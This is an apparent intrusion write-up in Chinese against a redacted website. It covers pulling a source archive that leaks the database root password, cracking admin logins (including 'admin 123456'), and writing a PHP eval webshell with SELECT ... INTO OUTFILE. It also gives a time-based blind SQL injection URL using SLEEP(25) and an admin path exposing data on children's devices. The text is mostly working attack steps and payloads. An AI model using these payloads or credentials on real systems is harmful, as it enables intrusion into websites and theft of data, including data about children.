http://**.**.**.**/web.rar
得到源码,发现ROOT密码
果断连接
由于密码太多,就不一一列举了
破解后,admin zzz
进入后台
**.**.**.**/admin/login.php?url=%2Fadmin%2F
**.**.**.**:100/test.php 路径暴露写入
select '<?php @eval($_POST[c])>'INTO OUTFILE 'D:\ylsx100\3DES_CLASS.php';
**.**.**.**:100/admin/login.php admin 123456
注入一处
**.**.**.**:100/get.php?nu=%27%2b(SELECT+1+FROM+(SELECT+SLEEP(25))A)%2b%27
儿童机
由于上传图片,卡了,只能这样列出
**.**.**.**/admin/terminal_excel.php?id=1 儿童机数据